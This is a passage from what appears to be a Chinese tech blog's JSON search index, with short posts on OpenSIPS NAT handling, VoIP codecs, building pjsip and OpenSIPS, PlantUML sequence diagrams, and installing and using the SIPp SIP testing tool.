","title":"几种常用电话信号音的含义"},{"content":"问题描述 连接服务器时的报警\n-bash: 警告:setlocale: LC_CTYPE: 无法改变区域选项 (UTF-8): 没有那个文件或目录 git status 发现本来应该显示 \u0026lsquo;on brance master\u0026rsquo; 之类的地方,居然英文也乱码了,都是问号。\n解决方案 vim /etc/environment , 然后加入如下代码,然后重新打开ssh窗口\nLC_ALL=en_US.UTF-8 LANG=en_US.UTF-8 
","permalink":"https://wdd.js.org/posts/2019/09/msx8i9/","summary":"问题描述 连接服务器时的报警\n-bash: 警告:setlocale: LC_CTYPE: 无法改变区域选项 (UTF-8): 没有那个文件或目录 git status 发现本来应该显示 \u0026lsquo;on brance master\u0026rsquo; 之类的地方,居然英文也乱码了,都是问号。\n解决方案 vim /etc/environment , 然后加入如下代码,然后重新打开ssh窗口\nLC_ALL=en_US.UTF-8 LANG=en_US.UTF-8 ","title":"Royal TSX git status 输出乱码"},{"content":"git config --global --unset http.proxy ","permalink":"https://wdd.js.org/posts/2019/09/yko32n/","summary":"git config --global --unset http.proxy ","title":"git取消设置http代理"},{"content":"解决信令的过程 NAT检测 使用rport解决Via 在初始化请求和响应中修改Contact头 处理来自NAT内部的注册请求 Ping客户端使NAT映射保持打开 处理序列化请求 实现NAT检测 nat_uac_test 使用函数 nat_uac_test\n1 搜索Contact头存在于RFC 1918 中的地址 2 检测Via头中的received参数和源地址是否相同 4 最顶部的Via出现在RFC1918 / RFC6598地址中 8 搜索SDP头出现RFC1918 / RFC6598地址 16 测试源端口是否和Via头中的端口不同 32 比较Contact中的地址和源信令的地址 64 比较Contact中的端口和源信令的端口 上边的测试都是可以组合的,并且任何一个测试通过,则返回true。\n例如下面的测试19,实际上是1+2+16三项测试的组合\nnat_uac_test(\u0026#34;19\u0026#34;) 使用rport和received参数标记Via头 从NAT内部出去的呼叫,往往可能不知道自己的出口IP和端口,只有远端的SIP服务器收到请求后,才能知道UAC的真实出口IP和端口。出口IP用received=x.x.x.x,出口端口用rport=xx。当有消息发到UAC时,应当发到received和rport所指定的地址和端口。\n# 原始的Via Via: SIP/2.0/UDP 192.168.4.48:5062;branch=z9hG4bK523223793;rport # 经过opensips处理后的Via Via: SIP/2.0/UDP 192.168.4.48:5062;received=192.168.4.48;branch=z9hG4bK523223793;rport=5062 修复Contact头 Via头和Contact头是比较容易混淆的概念,但是两者的功能完全不同。Via头是用来导航183和200响应应该如何按照原路返回。Contact用来给序列化请求,例如BYE和UPDATE导航。如果Contact头不正确,可能会导致呼叫无法挂断。那么就需要用fix_nated_contact()函数去修复Contact头。另外,对于183和200的响应也需要去修复Contact头。\n处理注册请求 RFC 1918 地址组 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) 参考 http://www.rfcreader.com/#rfc1918 ","permalink":"https://wdd.js.org/opensips/ch1/fix-nat/","summary":"解决信令的过程 NAT检测 使用rport解决Via 在初始化请求和响应中修改Contact头 处理来自NAT内部的注册请求 Ping客户端使NAT映射保持打开 处理序列化请求 实现NAT检测 nat_uac_test 使用函数 nat_uac_test\n1 搜索Contact头存在于RFC 1918 中的地址 2 检测Via头中的received参数和源地址是否相同 4 最顶部的Via出现在RFC1918 / 
RFC6598地址中 8 搜索SDP头出现RFC1918 / RFC6598地址 16 测试源端口是否和Via头中的端口不同 32 比较Contact中的地址和源信令的地址 64 比较Contact中的端口和源信令的端口 上边的测试都是可以组合的,并且任何一个测试通过,则返回true。\n例如下面的测试19,实际上是1+2+16三项测试的组合\nnat_uac_test(\u0026#34;19\u0026#34;) 使用rport和received参数标记Via头 从NAT内部出去的呼叫,往往可能不知道自己的出口IP和端口,只有远端的SIP服务器收到请求后,才能知道UAC的真实出口IP和端口。出口IP用received=x.x.x.x,出口端口用rport=xx。当有消息发到UAC时,应当发到received和rport所指定的地址和端口。\n# 原始的Via Via: SIP/2.0/UDP 192.168.4.48:5062;branch=z9hG4bK523223793;rport # 经过opensips处理后的Via Via: SIP/2.0/UDP 192.168.4.48:5062;received=192.168.4.48;branch=z9hG4bK523223793;rport=5062 修复Contact头 Via头和Contact头是比较容易混淆的概念,但是两者的功能完全不同。Via头是用来导航183和200响应应该如何按照原路返回。Contact用来给序列化请求,例如BYE和UPDATE导航。如果Contact头不正确,可能会导致呼叫无法挂断。那么就需要用fix_nated_contact()函数去修复Contact头。另外,对于183和200的响应也需要去修复Contact头。\n处理注册请求 RFC 1918 地址组 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) 参考 http://www.rfcreader.com/#rfc1918 ","title":"NAT解决方法"},{"content":" 编码 带宽 MOS 环境 特点 说明 G.711 64 kbps 4.45 LAN/WAN 语音质量高,适合对接网关 G.711实际上就是PCM, 是最基本的编码方式。PCM又分为两类PCMA(g711a), PCMU(g711u)。中国使用的是PCMA G.729 8 kbps 4.04 WAN 带宽占用率很小,同时能保证不错的语音质量 分为G729a和G729b两种,G729之所以带宽占用是G711的1/8, 是因为G729的压缩算法不同。G729传输的不是真正的语音,而是语音压缩后的结果。G729的编解码是有专利的,也就是说不免费。 G.722 64 kbps 4.5 LAN 语音质量高 HD hd语音 GSM 13.3 kbps 3.01 iLBA 13.3 15.2 抗丢包 OPUS 6-510 kbps - INTERNET OPUS的带宽范围跨度很广,适合语音和视频 MOS值,Mean Opinion Score,用来定义语音质量。满分为5分,最低1分。\nMOS 质量 5 极好的 4 不错的 3 还行吧 2 中等差 1 最差 通常的打包是20ms一个包,那么一秒就会传输1000/20=50个包。如果采样频率是8000Hz, 那么每个包会携带 8000/50=160个采样数据。在PCMA或者PCMU中,每个采样数据占用1字节。因此20ms的一个包就携带160字节的数据。\n在RTP包协议中,160字节还要加上12个字节的RTP头。 在fs上可以使用下面的命令查看fs支持的编码。\nshow codec ","permalink":"https://wdd.js.org/opensips/ch4/media-codec/","summary":" 编码 带宽 MOS 环境 特点 说明 G.711 64 kbps 4.45 LAN/WAN 语音质量高,适合对接网关 G.711实际上就是PCM, 是最基本的编码方式。PCM又分为两类PCMA(g711a), PCMU(g711u)。中国使用的是PCMA G.729 8 kbps 4.04 WAN 带宽占用率很小,同时能保证不错的语音质量 分为G729a和G729b两种,G729之所以带宽占用是G711的1/8, 
是因为G729的压缩算法不同。G729传输的不是真正的语音,而是语音压缩后的结果。G729的编解码是有专利的,也就是说不免费。 G.722 64 kbps 4.5 LAN 语音质量高 HD hd语音 GSM 13.3 kbps 3.01 iLBA 13.3 15.2 抗丢包 OPUS 6-510 kbps - INTERNET OPUS的带宽范围跨度很广,适合语音和视频 MOS值,Mean Opinion Score,用来定义语音质量。满分为5分,最低1分。\nMOS 质量 5 极好的 4 不错的 3 还行吧 2 中等差 1 最差 通常的打包是20ms一个包,那么一秒就会传输1000/20=50个包。如果采样频率是8000Hz, 那么每个包会携带 8000/50=160个采样数据。在PCMA或者PCMU中,每个采样数据占用1字节。因此20ms的一个包就携带160字节的数据。\n在RTP包协议中,160字节还要加上12个字节的RTP头。 在fs上可以使用下面的命令查看fs支持的编码。\nshow codec ","title":"常见媒体流编码及其特点"},{"content":"环境说明 centos7.6 docker 容器 过程 wget https://www.pjsip.org/release/2.9/pjproject-2.9.zip unzip pjproject-2.9.zip cd pjproject-2.9 chmod +x configure aconfigure yum install gcc gcc-c++ make -y make dep make make install yum install centos-release-scl yum install rh-python36 参考 https://www.pjsip.org/download.htm https://trac.pjsip.org/repos/wiki/Getting-Started https://trac.pjsip.org/repos/wiki/Getting-Started/Autoconf https://linuxize.com/post/how-to-install-python-3-on-centos-7/ ","permalink":"https://wdd.js.org/opensips/tools/pjsip/","summary":"环境说明 centos7.6 docker 容器 过程 wget https://www.pjsip.org/release/2.9/pjproject-2.9.zip unzip pjproject-2.9.zip cd pjproject-2.9 chmod +x configure aconfigure yum install gcc gcc-c++ make -y make dep make make install yum install centos-release-scl yum install rh-python36 参考 https://www.pjsip.org/download.htm https://trac.pjsip.org/repos/wiki/Getting-Started https://trac.pjsip.org/repos/wiki/Getting-Started/Autoconf https://linuxize.com/post/how-to-install-python-3-on-centos-7/ ","title":"pjsip"},{"content":"前端组件化时,有个很时髦的词语叫做关注点分离,这个用在组件上比较好,我们可以把大的模块分割成小的模块,降低了整个模块的复杂度。\n但是有时候,我觉得关注点分离并不好。这个不是指在代码开发过程,而是解决问题的过程。\n关注点分离的处理方式 假如我要解决问题A,但是在解决过程中,我发现了一个我不知道的东西B, 然后我就去研究这B是什么东西,然后接二连三,我从B一路找到了Z。\n然后在这个解决过程耽误一段时间后,才想起来:我之前是要解决什么问题来着??\n关注点集中的处理方式 不要在深究的路径上走得太深 在走其他路径时,也不要忘记最后要回到A点 
","permalink":"https://wdd.js.org/posts/2019/09/xi7kpf/","summary":"前端组件化时,有个很时髦的词语叫做关注点分离,这个用在组件上比较好,我们可以把大的模块分割成小的模块,降低了整个模块的复杂度。\n但是有时候,我觉得关注点分离并不好。这个不是指在代码开发过程,而是解决问题的过程。\n关注点分离的处理方式 假如我要解决问题A,但是在解决过程中,我发现了一个我不知道的东西B, 然后我就去研究这B是什么东西,然后接二连三,我从B一路找到了Z。\n然后在这个解决过程耽误一段时间后,才想起来:我之前是要解决什么问题来着??\n关注点集中的处理方式 不要在深究的路径上走得太深 在走其他路径时,也不要忘记最后要回到A点 ","title":"关注点分离的问题"},{"content":"web服务器如果是基于tcp的,那么用来监听的端口例如80,一定只能用来接收消息,而不能从这个端口主动发消息出去。\n但是udp服务器就不一样了,同一端口,既可以用来做listen的端口,也可以从这个端口主动发消息出去。\n","permalink":"https://wdd.js.org/posts/2019/09/vc8oxs/","summary":"web服务器如果是基于tcp的,那么用来监听的端口例如80,一定只能用来接收消息,而不能从这个端口主动发消息出去。\n但是udp服务器就不一样了,同一端口,既可以用来做listen的端口,也可以从这个端口主动发消息出去。","title":"TCP和UDP的区别畅想"},{"content":"我觉得PlantUML非常适合绘制时序图,先给个完整的例子,我经常用PlantUML画SIP请求时序图。\n@startuml autonumber alice-\u0026gt;bob: INVITE bob-[#green]\u0026gt;alice: 180 Ringing bob-[#green]\u0026gt;alice: 200 OK == talking == bob-[#green]\u0026gt;alice: BYE alice-\u0026gt;bob: 200 OK @enduml 简单箭头 \u0026ndash;\u0026gt; 虚线箭头 -\u0026gt; 简单箭头 -[#red]\u0026gt; 带颜色的箭头 @startuml alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 声明参与者顺序 先使用participant关键字声明了bob, 那么bob就会出现在最左边\n@startuml participant bob participant alice alice-\u0026gt;bob: INVITE bob-\u0026gt;alice: 180 Ringing @enduml 声明参与者类型 actor boundary control entity database @startuml participant start actor a boundary b control c entity d database e start-\u0026gt;a start-\u0026gt;b start-\u0026gt;c start-\u0026gt;d start-\u0026gt;e @enduml 箭头颜色 -[#red]\u0026gt; -[#0000ff]-\u0026gt; @startuml Bob -[#red]\u0026gt; Alice : hello Alice -[#0000FF]-\u0026gt;Bob : ok @enduml 箭头样式 @startuml Bob -\u0026gt;x Alice Bob -\u0026gt; Alice Bob -\u0026gt;\u0026gt; Alice Bob -\\ Alice Bob \\\\- Alice Bob //-- Alice Bob -\u0026gt;o Alice Bob o\\\\-- Alice Bob \u0026lt;-\u0026gt; Alice Bob \u0026lt;-\u0026gt;o Alice @enduml 箭头自动编号 设置autonumber\n@startuml autonumber alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 
","permalink":"https://wdd.js.org/posts/2019/09/hvscve/","summary":"我觉得PlantUML非常适合绘制时序图,先给个完整的例子,我经常会用到的PlantUML画SIP请求时序图。\n@startuml autonumber alice-\u0026gt;bob: INVITE bob-[#green]\u0026gt;alice: 180 Ringing bob-[#green]\u0026gt;alice: 200 OK == talking == bob-[#green]\u0026gt;alice: BYE alice-\u0026gt;bob: 200 OK @enduml 简单箭头 \u0026ndash;\u0026gt; 虚线箭头 -\u0026gt; 简单箭头 -[#red]\u0026gt; 带颜色的箭头 @startuml alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 声明参与者顺序 先使用participant关键字声明了bob, 那么bob就会出现在最左边\n@startuml participant bob participant alice alice-\u0026gt;bob: INVITE bob-\u0026gt;alice: 180 Ringing @enduml 声明参与者类型 actor boundary control entity database @startuml participant start actor a boundary b control c entity d database e start-\u0026gt;a start-\u0026gt;b start-\u0026gt;c start-\u0026gt;d start-\u0026gt;e @enduml 箭头颜色 -[#red]\u0026gt; -[#0000ff]-\u0026gt; @startuml Bob -[#red]\u0026gt; Alice : hello Alice -[#0000FF]-\u0026gt;Bob : ok @enduml 箭头样式 @startuml Bob -\u0026gt;x Alice Bob -\u0026gt; Alice Bob -\u0026gt;\u0026gt; Alice Bob -\\ Alice Bob \\\\- Alice Bob //-- Alice Bob -\u0026gt;o Alice Bob o\\\\-- Alice Bob \u0026lt;-\u0026gt; Alice Bob \u0026lt;-\u0026gt;o Alice @enduml 箭头自动编号 设置autonumber","title":"PlantUML教程 包学包会"},{"content":"安装依赖 yum update \u0026amp;\u0026amp; yum install epel-release yum install openssl-devel mariadb-devel libmicrohttpd-devel \\ libcurl-devel libconfuse-devel ncurses-devel 编译 下面的脚本,默认将opensips安装在/usr/local/etc/目录下\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 如果想要指定安装位置,可以使用prefix参数指定,例如指定安装在/usr/aaa目录\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 
# 安装 \u0026gt; make install prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch3/centos-install/","summary":"安装依赖 yum update \u0026amp;\u0026amp; yum install epel-release yum install openssl-devel mariadb-devel libmicrohttpd-devel \\ libcurl-devel libconfuse-devel ncurses-devel 编译 下面的脚本,默认将opensips安装在/usr/local/etc/目录下\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 如果想要指定安装位置,可以使用prefix参数指定,例如指定安装在/usr/aaa目录\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; ","title":"centos7 安装opensips"},{"content":"安装 SIPp 3.3 # 解压 tar -zxvf sipp-3.3.990.tar.gz # centos 安装依赖 yum install lksctp-tools-devel libpcap-devel gcc-c++ gcc -y # ubuntu 安装依赖 apt-get install -y pkg-config dh-autoreconf ncurses-dev build-essential libssl-dev libpcap-dev libncurses5-dev libsctp-dev lksctp-tools ./configure --with-sctp --with-pcap make \u0026amp;\u0026amp; make install sipp -v SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 6 2019, 20:12:17. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. 
附件 sipp-3.3.990.tar.gz\n使用默认场景 uas sipp -sn uas -i 192.168.2.101 -sn 表示使用默认场景文件 uas 作为sip服务器 uac 作为sip客户端 -i 设置本地ip给Contact头 demo场景 sipp模拟sip服务器,当收到invite之后,先返回100,然后返回183,然后返回500\n首先我们将sipp内置的uas场景文件拿出来,基于这个场景文件做修改\n生成配置文件 sipp -sd uas \u0026gt; uas.xml 编辑配置文件\n启动uas\nsipp -sf uas.xml -i 192.168.40.77 -p 18627 -bg -skip_rlimit 帮助文档 Usage: sipp remote_host[:remote_port] [options] Available options: -v : Display version and copyright information. -aa : Enable automatic 200 OK answer for INFO, UPDATE and NOTIFY messages. -auth_uri : Force the value of the URI for authentication. By default, the URI is composed of remote_ip:remote_port. -au : Set authorization username for authentication challenges. Default is taken from -s argument -ap : Set the password for authentication challenges. Default is \u0026#39;password\u0026#39; -base_cseq : Start value of [cseq] for each call. -bg : Launch SIPp in background mode. -bind_local : Bind socket to local IP address, i.e. the local IP address is used as the source IP address. If SIPp runs in server mode it will only listen on the local IP address instead of all IP addresses. -buff_size : Set the send and receive buffer size. -calldebug_file : Set the name of the call debug file. -calldebug_overwrite: Overwrite the call debug file (default true). -cid_str : Call ID string (default %u-%p@%s). %u=call_number, %s=ip_address, %p=process_number, %%=% (in any order). -ci : Set the local control IP address -cp : Set the local control port number. Default is 8888. -d : Controls the length of calls. More precisely, this controls the duration of \u0026#39;pause\u0026#39; instructions in the scenario, if they do not have a \u0026#39;milliseconds\u0026#39; section. Default value is 0 and default unit is milliseconds. -deadcall_wait : How long the Call-ID and final status of calls should be kept to improve message and error logs (default unit is ms). -default_behaviors: Set the default behaviors that SIPp will use. 
Possbile values are: - all\tUse all default behaviors - none\tUse no default behaviors - bye\tSend byes for aborted calls - abortunexp\tAbort calls on unexpected messages - pingreply\tReply to ping requests If a behavior is prefaced with a -, then it is turned off. Example: all,-bye -error_file : Set the name of the error log file. -error_overwrite : Overwrite the error log file (default true). -f : Set the statistics report frequency on screen. Default is 1 and default unit is seconds. -fd : Set the statistics dump log report frequency. Default is 60 and default unit is seconds. -i : Set the local IP address for \u0026#39;Contact:\u0026#39;,\u0026#39;Via:\u0026#39;, and \u0026#39;From:\u0026#39; headers. Default is primary host IP address. -inf : Inject values from an external CSV file during calls into the scenarios. First line of this file say whether the data is to be read in sequence (SEQUENTIAL), random (RANDOM), or user (USER) order. Each line corresponds to one call and has one or more \u0026#39;;\u0026#39; delimited data fields. Those fields can be referred as [field0], [field1], ... in the xml scenario file. Several CSV files can be used simultaneously (syntax: -inf f1.csv -inf f2.csv ...) -infindex : file field Create an index of file using field. For example -inf users.csv -infindex users.csv 0 creates an index on the first key. -ip_field : Set which field from the injection file contains the IP address from which the client will send its messages. If this option is omitted and the \u0026#39;-t ui\u0026#39; option is present, then field 0 is assumed. Use this option together with \u0026#39;-t ui\u0026#39; -l : Set the maximum number of simultaneous calls. Once this limit is reached, traffic is decreased until the number of open calls goes down. Default: (3 * call_duration (s) * rate). -log_file : Set the name of the log actions log file. -log_overwrite : Overwrite the log actions log file (default true). 
-lost : Set the number of packets to lose by default (scenario specifications override this value). -rtcheck : Select the retransmisison detection method: full (default) or loose. -m : Stop the test and exit when \u0026#39;calls\u0026#39; calls are processed -mi : Set the local media IP address (default: local primary host IP address) -master : 3pcc extended mode: indicates the master number -max_recv_loops : Set the maximum number of messages received read per cycle. Increase this value for high traffic level. The default value is 1000. -max_sched_loops : Set the maximum number of calsl run per event loop. Increase this value for high traffic level. The default value is 1000. -max_reconnect : Set the the maximum number of reconnection. -max_retrans : Maximum number of UDP retransmissions before call ends on timeout. Default is 5 for INVITE transactions and 7 for others. -max_invite_retrans: Maximum number of UDP retransmissions for invite transactions before call ends on timeout. -max_non_invite_retrans: Maximum number of UDP retransmissions for non-invite transactions before call ends on timeout. -max_log_size : What is the limit for error and message log file sizes. -max_socket : Set the max number of sockets to open simultaneously. This option is significant if you use one socket per call. Once this limit is reached, traffic is distributed over the sockets already opened. Default value is 50000 -mb : Set the RTP echo buffer size (default: 2048). -message_file : Set the name of the message log file. -message_overwrite: Overwrite the message log file (default true). -mp : Set the local RTP echo port number. Default is 6000. -nd : No Default. 
Disable all default behavior of SIPp which are the following: - On UDP retransmission timeout, abort the call by sending a BYE or a CANCEL - On receive timeout with no ontimeout attribute, abort the call by sending a BYE or a CANCEL - On unexpected BYE send a 200 OK and close the call - On unexpected CANCEL send a 200 OK and close the call - On unexpected PING send a 200 OK and continue the call - On any other unexpected message, abort the call by sending a BYE or a CANCEL -nr : Disable retransmission in UDP mode. -nostdin : Disable stdin. -p : Set the local port number. Default is a random free port chosen by the system. -pause_msg_ign : Ignore the messages received during a pause defined in the scenario -periodic_rtd : Reset response time partition counters each logging interval. -plugin : Load a plugin. -r : Set the call rate (in calls per seconds). This value can bechanged during test by pressing \u0026#39;+\u0026#39;,\u0026#39;_\u0026#39;,\u0026#39;*\u0026#39; or \u0026#39;/\u0026#39;. Default is 10. pressing \u0026#39;+\u0026#39; key to increase call rate by 1 * rate_scale, pressing \u0026#39;-\u0026#39; key to decrease call rate by 1 * rate_scale, pressing \u0026#39;*\u0026#39; key to increase call rate by 10 * rate_scale, pressing \u0026#39;/\u0026#39; key to decrease call rate by 10 * rate_scale. If the -rp option is used, the call rate is calculated with the period in ms given by the user. -rp : Specify the rate period for the call rate. Default is 1 second and default unit is milliseconds. This allows you to have n calls every m milliseconds (by using -r n -rp m). Example: -r 7 -rp 2000 ==\u0026gt; 7 calls every 2 seconds. -r 10 -rp 5s =\u0026gt; 10 calls every 5 seconds. -rate_scale : Control the units for the \u0026#39;+\u0026#39;, \u0026#39;-\u0026#39;, \u0026#39;*\u0026#39;, and \u0026#39;/\u0026#39; keys. -rate_increase : Specify the rate increase every -fd units (default is seconds). 
This allows you to increase the load for each independent logging period. Example: -rate_increase 10 -fd 10s ==\u0026gt; increase calls by 10 every 10 seconds. -rate_max : If -rate_increase is set, then quit after the rate reaches this value. Example: -rate_increase 10 -rate_max 100 ==\u0026gt; increase calls by 10 until 100 cps is hit. -no_rate_quit : If -rate_increase is set, do not quit after the rate reaches -rate_max. -recv_timeout : Global receive timeout. Default unit is milliseconds. If the expected message is not received, the call times out and is aborted. -send_timeout : Global send timeout. Default unit is milliseconds. If a message is not sent (due to congestion), the call times out and is aborted. -sleep : How long to sleep for at startup. Default unit is seconds. -reconnect_close : Should calls be closed on reconnect? -reconnect_sleep : How long (in milliseconds) to sleep between the close and reconnect? -ringbuffer_files: How many error/message files should be kept after rotation? -ringbuffer_size : How large should error/message files be before they get rotated? -rsa : Set the remote sending address to host:port for sending the messages. -rtp_echo : Enable RTP echo. RTP/UDP packets received on port defined by -mp are echoed to their sender. RTP/UDP packets coming on this port + 2 are also echoed to their sender (used for sound and video echo). -rtt_freq : freq is mandatory. Dump response times every freq calls in the log file defined by -trace_rtt. Default value is 200. -s : Set the username part of the resquest URI. Default is \u0026#39;service\u0026#39;. -sd : Dumps a default scenario (embeded in the sipp executable) -sf : Loads an alternate xml scenario file. To learn more about XML scenario syntax, use the -sd option to dump embedded scenarios. They contain all the necessary help. -shortmessage_file: Set the name of the short message log file. -shortmessage_overwrite: Overwrite the short message log file (default true). 
-oocsf : Load out-of-call scenario. -oocsn : Load out-of-call scenario. -skip_rlimit : Do not perform rlimit tuning of file descriptor limits. Default: false. -slave : 3pcc extended mode: indicates the slave number -slave_cfg : 3pcc extended mode: indicates the file where the master and slave addresses are stored -sn : Use a default scenario (embedded in the sipp executable). If this option is omitted, the Standard SipStone UAC scenario is loaded. Available values in this version: - \u0026#39;uac\u0026#39; : Standard SipStone UAC (default). - \u0026#39;uas\u0026#39; : Simple UAS responder. - \u0026#39;regexp\u0026#39; : Standard SipStone UAC - with regexp and variables. - \u0026#39;branchc\u0026#39; : Branching and conditional branching in scenarios - client. - \u0026#39;branchs\u0026#39; : Branching and conditional branching in scenarios - server. Default 3pcc scenarios (see -3pcc option): - \u0026#39;3pcc-C-A\u0026#39; : Controller A side (must be started after all other 3pcc scenarios) - \u0026#39;3pcc-C-B\u0026#39; : Controller B side. - \u0026#39;3pcc-A\u0026#39; : A side. - \u0026#39;3pcc-B\u0026#39; : B side. -stat_delimiter : Set the delimiter for the statistics file -stf : Set the file name to use to dump statistics -t : Set the transport mode: - u1: UDP with one socket (default), - un: UDP with one socket per call, - ui: UDP with one socket per IP address The IP addresses must be defined in the injection file. - t1: TCP with one socket, - tn: TCP with one socket per call, - l1: TLS with one socket, - ln: TLS with one socket per call, - s1: SCTP with one socket (default), - sn: SCTP with one socket per call, - c1: u1 + compression (only if compression plugin loaded), - cn: un + compression (only if compression plugin loaded). This plugin is not provided with sipp. -timeout : Global timeout. Default unit is seconds. If this option is set, SIPp quits after nb units (-timeout 20s quits after 20 seconds). 
-timeout_error : SIPp fails if the global timeout is reached (-timeout option required). -timer_resol : Set the timer resolution. Default unit is milliseconds. This option has an impact on timer precision. Small values allow more precise scheduling but impact CPU usage. If the compression is on, the value is set to 50ms. The default value is 10ms. -T2 : Global T2-timer in milliseconds -sendbuffer_warn : Produce warnings instead of errors on SendBuffer failures. -trace_msg : Displays sent and received SIP messages in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_messages.log -trace_shortmsg : Displays sent and received SIP messages as CSV in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_shortmessages.log -trace_screen : Dump statistic screens in the \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_screens.log file when quitting SIPp. Useful to get a final status report in background mode (-bg option). -trace_err : Trace all unexpected messages in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_errors.log. -trace_calldebug : Dumps debugging information about aborted calls to \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_calldebug.log file. -trace_stat : Dumps all statistics in \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;.csv file. Use the \u0026#39;-h stat\u0026#39; option for a detailed description of the statistics file content. -trace_counts : Dumps individual message counts in a CSV file. -trace_rtt : Allow tracing of all response times in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_rtt.csv. -trace_logs : Allow tracing of \u0026lt;log\u0026gt; actions in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_logs.log. -users : Instead of starting calls at a fixed rate, begin \u0026#39;users\u0026#39; calls at startup, and keep the number of calls constant. -watchdog_interval: Set gap between watchdog timer firings. Default is 400. 
-watchdog_reset : If the watchdog timer has not fired in more than this time period, then reset the max triggers counters. Default is 10 minutes. -watchdog_minor_threshold: If it has been longer than this period between watchdog executions, count a minor trip. Default is 500. -watchdog_major_threshold: If it has been longer than this period between watchdog executions, count a major trip. Default is 3000. -watchdog_major_maxtriggers: How many times the major watchdog timer can be tripped before the test is terminated. Default is 10. -watchdog_minor_maxtriggers: How many times the minor watchdog timer can be tripped before the test is terminated. Default is 120. -tls_cert : Set the name for TLS Certificate file. Default is \u0026#39;cacert.pem\u0026#39; -tls_key : Set the name for TLS Private Key file. Default is \u0026#39;cakey.pem\u0026#39; -tls_crl : Set the name for Certificate Revocation List file. If not specified, X509 CRL is not activated. -3pcc : Launch the tool in 3pcc mode (\u0026#34;Third Party call control\u0026#34;). The passed IP address depends on the 3PCC role. - When the first twin command is \u0026#39;sendCmd\u0026#39; then this is the address of the remote twin socket. SIPp will try to connect to this address:port to send the twin command (This instance must be started after all other 3PCC scenarios). Example: 3PCC-C-A scenario. - When the first twin command is \u0026#39;recvCmd\u0026#39; then this is the address of the local twin socket. SIPp will open this address:port to listen for twin command. Example: 3PCC-C-B scenario. -tdmmap : Generate and handle a table of TDM circuits. A circuit must be available for the call to be placed. Format: -tdmmap {0-3}{99}{5-8}{1-31} -key : keyword value Set the generic parameter named \u0026#34;keyword\u0026#34; to \u0026#34;value\u0026#34;. -set : variable value Set the global variable parameter named \u0026#34;variable\u0026#34; to \u0026#34;value\u0026#34;. 
-multihome : Set multihome address for SCTP -heartbeat : Set heartbeat interval in ms for SCTP -assocmaxret : Set association max retransmit counter for SCTP -pathmaxret : Set path max retransmit counter for SCTP -pmtu : Set path MTU for SCTP -gracefulclose : If true, SCTP association will be closed with SHUTDOWN (default). If false, SCTP association will be closed by ABORT. -dynamicStart : variable value Set the start offset of dynamic_id variable -dynamicMax : variable value Set the maximum of dynamic_id variable -dynamicStep : variable value Set the increment of dynamic_id variable Signal handling: SIPp can be controlled using posix signals. The following signals are handled: USR1: Similar to pressing the \u0026#39;q\u0026#39; keyboard key. It triggers a soft exit of SIPp. No more new calls are placed and all ongoing calls are finished before SIPp exits. Example: kill -SIGUSR1 732 USR2: Triggers a dump of all statistics screens in \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_screens.log file. Especially useful in background mode to know what the current status is. Example: kill -SIGUSR2 732 Exit code: Upon exit (on fatal error or when the number of asked calls (-m option) is reached), sipp exits with one of the following exit codes: 0: All calls were successful 1: At least one call failed 97: exit on internal command. 
Calls may have been processed 99: Normal exit without calls processed -1: Fatal error -2: Fatal error binding a socket Example: Run sipp with embedded server (uas) scenario: ./sipp -sn uas On the same host, run sipp with embedded client (uac) scenario ./sipp -sn uac 127.0.0.1 参考 http://sipp.sourceforge.net/doc/reference.html http://sipp.sourceforge.net/doc3.3/reference.html 实战脚本学习 下面的两个链接里面有很多的真实场景测试的xml文件,可以用来深入学习\nhttps://github.com/pbertera/SIPp-by-example https://tomeko.net/other/sipp/sipp_cheatsheet.php?lang=pl 中文教程 sippZhong Wen Jiao Cheng - Knight.pdf 黄龙舟翻译 ","permalink":"https://wdd.js.org/opensips/tools/sipp/","summary":"安装 SIPp 3.3 # 解压 tar -zxvf sipp-3.3.990.tar.gz # centos 安装依赖 yum install lksctp-tools-devel libpcap-devel gcc-c++ gcc -y # ubuntu 安装依赖 apt-get install -y pkg-config dh-autoreconf ncurses-dev build-essential libssl-dev libpcap-dev libncurses5-dev libsctp-dev lksctp-tools ./configure --with-sctp 